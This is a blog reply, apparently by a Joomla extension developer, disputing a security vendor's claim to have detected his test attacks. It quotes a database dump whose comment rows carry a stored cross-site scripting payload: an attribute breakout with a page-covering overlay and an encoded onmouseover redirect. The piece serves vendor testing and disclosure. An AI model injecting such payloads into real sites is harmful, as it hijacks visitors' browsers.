Thursday, 23 December 2010 11:16
Jeff, I hate to argue with your response, but I'll say the same thing publicly that I told you privately: SecureLive did NOT detect the failed tests either time I ran them. I understand you employ scanning on your remote server instead of each individual client, and if you have updated your signatures and scanning technology to detect these attacks, then these tests have served their purpose - but I find it quite dishonest of you to make the claims you have after knowingly failing some of these tests twice. For example, you claim to have detected Test 2, while my test database for SecureLive clearly shows this was not the case for either the initial test OR the requested retest: -- -- Dumping data for table `jos_k2_comments` -- INSERT INTO `jos_k2_comments` (`id`, `itemID`, `userID`, `userName`, `commentDate`, `commentText`, `commentEmail`, `commentURL`, `published`) VALUES (1, 45, 0, 'test', '2010-12-13 23:11:35', 'haxed haha tooooooooooo shooooooooooooort', ' This e-mail address is being protected from spambots. You need JavaScript enabled to view it ', 'http://" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)', 1), (2, 44, 0, 'jeff', '2010-12-14 01:11:15', 'haha haxxed', ' This e-mail address is being protected from spambots. You need JavaScript enabled to view it ', 'http://" style="position:absolute;top:0px;left:0px;width:99em;height:99em" onmouseover="location.href=String.fromCharCode(104,116,116,112,58,47,47,106,101,102,102,99,104, 97,110,110,101,108,108,46,99,111,109)', 1); Furthermore, there is no confusion as to how any solution "detects" attacks - if the above code sent me on my way to jeffchannell.com, IT FAILED. This has nothing to do with "did it send a 40* error or not," because that was not the point - if the script ran unaltered (as it did during the tests) it was marked as failure. In the example of Test 2, not only was the unaltered script saved to the database and thus executed, but SecureLive's detection system was absolutely silent - no notifications, no IP banning, nothing.
 

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions